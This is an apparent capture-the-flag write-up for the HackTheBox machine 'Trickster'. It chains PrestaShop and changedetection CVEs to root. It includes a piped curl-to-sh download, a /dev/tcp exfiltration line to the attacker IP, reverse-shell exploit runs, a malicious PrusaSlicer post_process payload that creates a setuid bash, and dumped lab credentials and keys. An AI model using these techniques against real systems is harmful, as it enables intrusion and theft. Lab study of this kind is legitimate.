Trickster

Recon

nmap_scan.log|h-50%_styled

HTTP (80)

Placeholder

Writeup.png

Shop

Writeup-1.png

Creds: test:test:test02@trickster.htb:Password123$Lmao

PrestaShop is a freemium, open source e-commerce platform.

Writeup-2.png

Git Dump

Feroxbuster found http://shop.trickster.htb/.git/index

└─$ git-dumper http://shop.trickster.htb/ shop
[-] Testing http://shop.trickster.htb/.git/HEAD [200]
[-] Testing http://shop.trickster.htb/.git/ [200]
[-] Fetching .git recursively
...
Updated 1699 paths from the index

Hidden Admin Panel

Inside we get bunch of default files and admin634ewutrx1jgitlooaj directory, which should be a path.

http://shop.trickster.htb/admin634ewutrx1jgitlooaj/

Writeup-3.png

adam made changes:

commit 0cbc7831c1104f1fb0948ba46f75f1666e18e64c (HEAD -> admin_panel)
Author: adam <adam@trickster.htb>
Date:   Fri May 24 04:13:19 2024 -0400

    update admin pannel

Officially disclosed vulnerabilities: https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6

  1. Anonymous customer can download other customer's invoices

  2. XSS via customer contact form in FO, through file upload

Doesn't work: (CVE-2024-36680) Improper neutralization of SQL parameter in Promokit.eu - Facebook module for PrestaShop

XSS -> RCE

XSS: CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5) PoC: https://github.com/aelmokhtar/CVE-2024-34716

As blog says make changes to your exploit.html:

Writeup-4.png

Some changes are needed in exploit.py too (proxies was added for debug).

Writeup-5.png

Also reverse shell in zip file with your IP! after getting request on zip shell should come in quickly.

MySQL

www-data@trickster:~/prestashop/app/config$ cat parameters.php
<?php return array (
  'parameters' =>
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
    'api_private_key' => '-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQC5IVA/fGtlxwpt
L9UYoyu/x0XggmH0X02+Y9mqIU2kmcEeF9YTdhUz86sREQYrO2QcWxAZRlcUjCIF
BWzmQAbmN/D6FCuXz34lEPSiBn44dR838KCYzZ6rUf+DEBh9xF/CNKU6HZjMDCku
/C1hcG1Jy7pCpEB2i2iSpbabdoy34tXwRF0WwGSP785V0nyiyW9K3oqB/f0OcGkY
hcCpoVxB0x2r7WVP2iJvLR7HJSSXpolTbVJMVnuQJ/RJ5ynZ/02hoqgHAL2bvTsL
ZQI2QCYHYDbDF/zwEMLsK3BrPANb1Bd0X3ztFTMaP1SsRbBPBgRwlxX+E0Hjvdtz
K1om9jVlAgMBAAECggEAD5CTdKL7TJVNdRyeZ/HgDcGtSFDt92PD34v5kuo14u7i
Y6tRXlWBNtr3uPmbcSsPIasuUVGupJWbjpyEKV+ctOJjKkNj3uGdE3S3fJ/bINgI
BeX/OpmfC3xbZSOHS5ulCWjvs1EltZIYLFEbZ6PSLHAqesvgd5cE9b9k+PEgp50Q
DivaH4PxfI7IKLlcWiq2mBrYwsWHIlcaN0Ys7h0RYn7OjhrPr8V/LyJLIlapBeQV
Geq6MswRO6OXfLs4Rzuw17S9nQ0PDi4OqsG6I2tm4Puq4kB5CzqQ8WfsMiz6zFU/
UIHnnv9jrqfHGYoq9g5rQWKyjxMTlKA8PnMiKzssiQKBgQDeamSzzG6fdtSlK8zC
TXHpssVQjbw9aIQYX6YaiApvsi8a6V5E8IesHqDnS+s+9vjrHew4rZ6Uy0uV9p2P
MAi3gd1Gl9mBQd36Dp53AWik29cxKPdvj92ZBiygtRgTyxWHQ7E6WwxeNUWwMR/i
4XoaSFyWK7v5Aoa59ECduzJm1wKBgQDVFaDVFgBS36r4fvmw4JUYAEo/u6do3Xq9
JQRALrEO9mdIsBjYs9N8gte/9FAijxCIprDzFFhgUxYFSoUexyRkt7fAsFpuSRgs
+Ksu4bKxkIQaa5pn2WNh1rdHq06KryC0iLbNii6eiHMyIDYKX9KpByaGDtmfrsRs
uxD9umhKIwKBgECAXl/+Q36feZ/FCga3ave5TpvD3vl4HAbthkBff5dQ93Q4hYw8
rTvvTf6F9900xo95CA6P21OPeYYuFRd3eK+vS7qzQvLHZValcrNUh0J4NvocxVVn
RX6hWcPpgOgMl1u49+bSjM2taV5lgLfNaBnDLoamfEcEwomfGjYkGcPVAoGBAILy
1rL84VgMslIiHipP6fAlBXwjQ19TdMFWRUV4LEFotdJavfo2kMpc0l/ZsYF7cAq6
fdX0c9dGWCsKP8LJWRk4OgmFlx1deCjy7KhT9W/fwv9Fj08wrj2LKXk20n6x3yRz
O/wWZk3wxvJQD0XS23Aav9b0u1LBoV68m1WCP+MHAoGBANwjGWnrY6TexCRzKdOQ
K/cEIFYczJn7IB/zbB1SEC19vRT5ps89Z25BOu/hCVRhVg9bb5QslLSGNPlmuEpo
HfSWR+q1UdaEfABY59ZsFSuhbqvC5gvRZVQ55bPLuja5mc/VvPIGT/BGY7lAdEbK
6SMIa53I2hJz4IMK4vc2Ssqq
-----END PRIVATE KEY-----
',
  ),
);
www-data@trickster:~/prestashop/app/config$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_customer;'
+----------------------+--------------------------------------------------------------+
| email                | passwd                                                       |
+----------------------+--------------------------------------------------------------+
| adam@trickster.htb   | $2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei |
| anonymous@psgdpr.com | $2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW |
| pub@prestashop.com   | $2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG |
| test02@trickster.htb | $2y$10$T3rriOVB5f4N2ijQ4ypXaOjRAy0YxAXa/a2TOgrue2W1NgWSsrx0u |
+----------------------+--------------------------------------------------------------+
www-data@trickster:~/prestashop$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_employee;'
+---------------------+--------------------------------------------------------------+
| email               | passwd                                                       |
+---------------------+--------------------------------------------------------------+
| admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+

SSH

James is the user on box, so that's our target:

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alwaysandforever (?)
1g 0:00:00:07 DONE (2024-09-22 01:26) 0.1421g/s 5270p/s 5270c/s 5270C/s baloon..EMILIO
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Creds: james:alwaysandforever

User.txt

james@trickster:~$ cat user.txt
f8120cf85a0e3bd98e4cab6122242713

Privilege Escalation

james@trickster:~$ curl 10.10.14.47/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:4c:3e:57:d6  txqueuelen 0  (Ethernet)
        RX packets 90  bytes 5416 (5.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 420 (420.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.148.34  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:94:7d:78  txqueuelen 1000  (Ethernet)
        RX packets 40223  bytes 12591817 (12.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27575  bytes 8047886 (8.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 390010  bytes 630032318 (630.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 390010  bytes 630032318 (630.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth679c878: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 8e:38:a4:a6:ab:8d  txqueuelen 0  (Ethernet)
        RX packets 10  bytes 708 (708.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 84 (84.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:37301         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
...
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
...

Cronjobs

pspy shows some cronjobs running as root:

2024/09/21 21:43:23 CMD: UID=0     PID=1      | /sbin/init
2024/09/21 21:44:01 CMD: UID=0     PID=70504  | /usr/sbin/CRON -f -P
2024/09/21 21:44:01 CMD: UID=0     PID=70506  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70505  | /bin/sh -c /root/changedetection/backup_restore.sh > /dev/null
2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70509  | awk {print $1}
2024/09/21 21:44:01 CMD: UID=0     PID=70510  | /bin/bash /root/changedetection/backup_restore.sh
...
2024/09/21 21:44:11 CMD: UID=1003  PID=70513  | /home/runner/prestashop/chromedriver --port=52695
2024/09/21 21:44:11 CMD: UID=1003  PID=70526  | /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.5 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.112 --initial-client-fd=6 --shared-client-connection
2024/09/21 21:44:11 CMD: UID=1003  PID=70525  | /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.A64L6p data:,
...
2024/09/21 21:45:01 CMD: UID=0     PID=70597  | /bin/bash /root/scripts/clean_up/clean_up.sh

--remote-debugging-port=0 is interesting...

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/

Doing port forwarding on this port doesn't yield any success.

PrusaSlicer

Next interesting line is:

2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh

Because in opt there's prusaslicer binary.

james@trickster:/opt/PrusaSlicer$ ls -alh
total 81M
drwxr-xr-x 2 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 5 root root 4.0K Sep 13 12:24 ..
-rwxr-xr-x 1 root root  81M Sep  6  2023 prusaslicer
-rw-r--r-- 1 root root 136K May 23 22:08 TRICKSTER.3mf

*.3mf file is some kind of 3D object...

Writeup-6.png
james@trickster:/opt/PrusaSlicer$ ./prusaslicer
DISPLAY not set, GUI mode not available.

PrusaSlicer-2.6.1+linux-x64-GTK2-202309060801 based on Slic3r (with GUI support)
https://github.com/prusa3d/PrusaSlicer

PrusaSlicer 2.6.1 - Arbitrary code execution

2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"

Download the file

└─$ scp james@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf ./TRICKSTER.3mf

Edit post_process in Metadata/Slic3r_PE.config. output_filename_format was causing errors so I just left base filename there.

; post_process = "install /bin/bash /tmp/rootbash -m 4777 # "
; output_filename_format = {input_filename_base}.gcode
└─$ scp ./TRICKSTER.3mf james@trickster.htb:/tmp/TRICKSTER.3mf
james@trickster:~$ /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf

Payload is successful, but the problem is we ran it, not root... So no priv esc...

runc

Linpeas previously showed runc was runnable and to check HackTrickshttps://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalationhttps://dev.to/codeninjausman/hackthebox-htb-writeup-vessel-hard-10bb

Upon following the instructions we get

james@trickster:/tmp/t$ ps aux | grep runc
root       76436  0.0  0.3 1238400 12420 ?       Sl   22:40   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ae5c137aa8efc8eee17e3f5e2f93594b6bfc9ea2d7b350faba36e80d588aa47c -address /run/containerd/containerd.sock

james@trickster:/tmp/t$ runc run moby
FATA[0000] nsexec-1[77070]: failed to unshare user namespace: Operation not permitted
FATA[0000] nsexec-0[77069]: failed to sync with stage-1: next state: Success
ERRO[0000] runc run failed: unable to start container process: can't get final child's PID from pipe: EOF

Docker

I wasn't able to find anything useful, and the Docker kept bugging me so I just decided to scan the whole network.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

james@trickster:~$ /tmp/nmap -p- --min-rate 10000 172.17.0.1/16 -v -v -v -v
...
Nmap scan report for 172.17.255.254 [host down, received no-response]
Nmap scan report for 172.17.255.255 [host down, received net-unreach]
Initiating Connect Scan at 00:02
Scanning 2 hosts [65535 ports/host]
Discovered open port 80/tcp on 172.17.0.1
Discovered open port 22/tcp on 172.17.0.1
Discovered open port 5000/tcp on 172.17.0.2
Completed Connect Scan against 172.17.0.1 in 37.52s (1 host left)
Completed Connect Scan at 00:03, 37.52s elapsed (131070 total ports)
Nmap scan report for 172.17.0.1
Host is up, received syn-ack (0.0017s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Nmap scan report for 172.17.0.2
Host is up, received conn-refused (0.0018s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65534 closed ports
Reason: 65534 conn-refused
PORT     STATE SERVICE REASON
5000/tcp open  unknown syn-ack

Read data files from: /etc
Nmap done: 65536 IP addresses (2 hosts up) scanned in 363.82 seconds

Note: Probably would have been to scan /8 network 💀

Note (from _cutearmadillo_): You don't actually need to scan the network at all. The process list shows the PID of the container (containerd-shim-runc-v2), then you go check /proc/PID/net/arp. With ps -efj you also find the process running in the container and its PID and then check the open port via /proc/PID/net/tcp (in hex)

changedetection

└─$ ssh james@trickster.htb -L 5000:172.17.0.2:5000

It asks for password and James's password works.

Writeup-7.png

Version is v0.45.20

changedetection < 0.45.20 - Remote Code Execution (RCE)CVE-2024-32651-changedetection-RCE

Remove the password authentication, because script doesn't like it.

Writeup-8.png

Docker Shell

└─$ py CVE-2024-32651.py --url http://localhost:5000 --ip 10.10.14.47 --port 4444 --notification get://10.10.14.47
---
Now create a new file on server, then Recheck and then it gets triggered
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.148.34:46942.
root@ae5c137aa8ef:/app# id
uid=0(root) gid=0(root) groups=0(root)

Note: Make sure to change reddit urls in PoC to internal URLs, can be simple http server.

root@ae5c137aa8ef:/datastore# cat secret.txt;echo
5fce75c64d33acf05d2d3b21d29e693d992f240d5c440310cff3edfb743c64a5
root@ae5c137aa8ef:/datastore# tar -czvf data.tgz ./*
---
listen 4445 > data.tgz.base64
---
root@ae5c137aa8ef:/datastore# base64 data.tgz > /dev/tcp/10.10.14.47/4445
---
base64 -d data.tgz.base64 > data.tgz

Root (Unintended)

root@ae5c137aa8ef:~# ls -alh
ls -alh
total 36K
drwx------ 1 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 ..
-rw------- 1 root root  405 Sep 16 15:34 .bash_history
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
-rw-r--r-- 1 root root  254 Apr 10 04:57 .wget-hsts
root@ae5c137aa8ef:~# cat .bash_history
cat .bash_history
apt update
#YouC4ntCatchMe#
apt-get install libcap2-bin
capsh --print
clear
capsh --print
cd changedetectionio/

Creds: root:#YouC4ntCatchMe#

james@trickster:~$ su
Password:
root@trickster:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@trickster:~# cat root.txt
7e5354393df7a938ee6b7ec199173d06

Root (Intended)

└─$ sudo apt install brotli
└─$ pwd
//Trickster/www/data/Backups/changedetection-backup-20240830194841
└─$ unzip changedetection-backup-20240830194841.zip -d changedetection-backup-20240830194841
└─$ brotli -d changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
└─$ grep -E 'user|pass' changedetection-backup-20240830194841 -Rain
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:27:                'database_user' => 'adam' ,                                                    
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:28:                'database_password' => 'adam_admin992' ,                                       
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:33:                'mailer_user' => NULL ,                                                        
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:34:                'mailer_password' => NULL ,                                                    
changedetection-backup-20240830194841/url-watches.json:145:            "password": false,
changedetection-backup-20240830194841/url-watches.json:332:            "removepassword_button": false

Creds: adam:adam_admin992

└─$ ssh adam@trickster.htb
adam@trickster.htb password: adam_admin992
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

adam can run prusaslicer as root, so let's go back and use the previous malicious *.3mf file again for root.

adam@trickster:~$ sudo /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf
adam@trickster:~$ /tmp/rootbash -p
rootbash-5.1# id
uid=1002(adam) gid=1002(adam) euid=0(root) groups=1002(adam)
PreviousSightlessNextUniversity

Last updated